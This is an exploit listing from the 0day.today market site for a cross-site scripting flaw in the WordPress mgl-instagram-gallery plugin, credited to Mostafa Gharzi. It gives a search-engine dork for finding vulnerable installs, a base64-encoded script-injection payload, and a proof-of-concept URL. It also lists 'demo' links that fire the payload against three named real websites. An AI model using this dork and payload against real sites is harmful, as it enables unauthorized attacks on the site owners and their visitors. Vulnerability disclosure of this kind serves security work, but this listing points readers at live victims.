[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress mgl-instagram-gallery Plugin Cross Site Scripting Vulnerability

Author
Mostafa Gharzi
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-29300
Category
web applications
Date add
22-12-2017
Platform
php
[+] Title: WordPress mgl-instagram-gallery Plugin Cross Site Scripting (XSS)
[+] Author: Mostafa Gharzi
[+] Vendor Homepage: www.Wordpress.org , www.pluginu.com/mgl-instagram-gallery/
[+] Tested on: Windows 10 & Kali Linux
[+] Vulnerable File: single-gallery.php
[+] Vulnerable Parameter: Get Method
[+} Dorks : inurl:/wp-content/plugins/mgl-instagram-gallery/single-gallery.php?media=

### XSS Alert Code Encoded by Base64:

[+] Example: "><script>alert('xss');</script>
             ==> Base64 Algorithm
             ==> Ij48c2NyaXB0PmFsZXJ0KCd4c3MnKTs8L3NjcmlwdD4=
			 
### POC:

[+] http://site/wp-content/plugins/mgl-instagram-gallery/single-gallery.php?media=[XSS Alert Code Encoded by Base64]

### Demo:

[+] http://www.northbeachbandshell.com/wp-content/plugins/mgl-instagram-gallery/single-gallery.php?media=Ij48c2NyaXB0PmFsZXJ0KCd4c3MnKTs8L3NjcmlwdD4=

[+] http://lauklines.no/wp-content/plugins/mgl-instagram-gallery/single-gallery.php?media=Ij48c2NyaXB0PmFsZXJ0KCd4c3MnKTs8L3NjcmlwdD4=

[+] http://gourmetbistro.ca/wp-content/plugins/mgl-instagram-gallery/single-gallery.php?media=Ij48c2NyaXB0PmFsZXJ0KCd4c3MnKTs8L3NjcmlwdD4=

### Special Thanks:

[+] CertCC.ir
[+] Gucert.ir

#  0day.today [2024-11-15]  #